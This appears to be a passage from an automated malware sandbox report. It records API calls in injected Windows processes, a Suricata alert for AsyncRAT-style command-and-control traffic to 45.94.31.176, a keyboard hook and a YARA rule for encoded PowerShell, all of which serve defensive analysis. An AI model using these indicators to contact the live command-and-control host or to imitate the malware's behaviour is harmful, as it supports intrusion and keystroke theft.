        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000021C29A6F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000021C29A6F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000021C29A6F264 FindFirstFileExW,23_2_0000021C29A6F264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_00000276D72CF264 FindFirstFileExW,24_2_00000276D72CF264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_00000276D72CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000276D72CF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000021D846CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000021D846CF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000021D846CF264 FindFirstFileExW,25_2_0000021D846CF264
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_0000025BFDA9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_0000025BFDA9F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_0000025BFDA9F264 FindFirstFileExW,26_2_0000025BFDA9F264
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000001691456F264 FindFirstFileExW,27_2_000001691456F264
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000001691456F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_000001691456F3E8

        Networking

        Source: Network traffic | Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 45.94.31.176:4782 -> 192.168.2.5:49713
        Source: global traffic | TCP traffic: 192.168.2.5:49713 -> 45.94.31.176:4782
        Source: Joe Sandbox View | IP Address: 2.16.164.49
        Source: Joe Sandbox View | IP Address: 195.201.57.90
        Source: Joe Sandbox View | ASN Name: GBTCLOUDUS
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown | DNS query: name: ipwho.is
        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: ipwho.is | Connection: Keep-Alive
        Source: unknown | TCP traffic detected without corresponding DNS query: 45.94.31.176
        Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.181.227
        Source: unknown | TCP traffic detected without corresponding DNS query: 2.16.164.49
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ipwho.is
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: lsass.exe, 0000000E.00000000.1577030626.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2733492664.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576550853.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: lsass.exe, 0000000E.00000000.1577030626.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2733492664.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576550853.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
        Source: lsass.exe, 0000000E.00000000.1578750595.0000019AB8C75000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2757045259.0000019AB8C75000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: powershell.exe, 00000008.00000002.2736820905.0000020D05C42000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C00000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
        Source: svchost.exe, 00000018.00000000.1651233793.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2766065494.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
        Source: powershell.exe, 00000005.00000002.1436384830.0000027136ECB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.corosoft%20Time-Stamp%20PCA%202010(1).crl0
        Source: powershell.exe, 00000005.00000002.1416391663.00000271202BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712EAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
        Source: lsass.exe, 0000000E.00000000.1577030626.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2733492664.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578969138.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576550853.0000019AB846F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2768342256.0000019AB8D83000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: svchost.exe, 00000017.00000002.2721583993.0000021C28BE0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
        Source: powershell.exe, 00000005.00000002.1416391663.000002711E8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
        Source: lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: lsass.exe, 0000000E.00000000.1579067495.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576512802.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2774064217.0000019AB8DCF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1579164806.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2748590319.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1578526960.0000019AB8C46000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.1576447418.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2776918528.0000019AB8DE0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000002.2729868190.0000019AB842F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
        Source: svchost.exe, 0000001F.00000002.2840702182.0000027714483000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1684984868.0000027714483000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.msftconnecttest.com
        Source: svchost.exe, 0000001F.00000002.2840702182.0000027714483000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1684984868.0000027714483000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.msftconnecttest.com/
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000005.00000002.1416391663.000002711E8F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D07E81000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6xGX%
        Source: powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: svchost.exe, 00000029.00000002.2816272726.000002565B218000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comSRD1%
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdC:
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
        Source: svchost.exe, 00000018.00000000.1656594821.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1779407636.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1787154224.00000276D7EBA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2f%
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000005.00000002.1416391663.000002711FDA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000005.00000002.1416391663.00000271202BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712EAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1432406591.000002712E966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: svchost.exe, 00000029.00000000.1728791897.000002565AE1C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
        Source: svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1731740290.000002565B3AD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2834498317.000002565B4EB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.comSRD1-
        Source: svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comSRD13
        Source: svchost.exe, 00000018.00000003.1776467589.00000276D7C1E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns2-am3p.notify.windows.com/?token=AwYAAAAVHcznLkp9fcrV9Clhd2HepVc2%2fAlS973crXBsYmvJM5lgXx
        Source: svchost.exe, 00000029.00000000.1732975390.000002565B56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2001193978.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2002771455.000002565B56E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2825302592.000002565B443000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1732166559.000002565B443000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1728303755.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2793878629.000002565AD9B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.comSRD1#
        Source: svchost.exe, 00000029.00000002.2817889287.000002565B284000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.1731065473.000002565B284000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/pwaimages
        Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.5:49714 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DirectInput8Creatememstr_58eb6571-e
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: GetRawInputDatamemstr_72dfcd9f-b
        Source: Yara match | File source: 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR

        System Summary

        Source: Process Memory Space: powershell.exe PID: 8748, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: uy2g7z.bat | Static file information: 6277741
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D193840 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,TlsSetValue, | 9_2_000001F66D193840
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D194038 NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW, | 9_2_000001F66D194038
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D1935B8 NtEnumerateKey,NtEnumerateValueKey, | 9_2_000001F66D1935B8
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB93732EC NtQueryDirectoryFileEx,GetFileType,StrCpyW, | 14_2_0000019AB93732EC
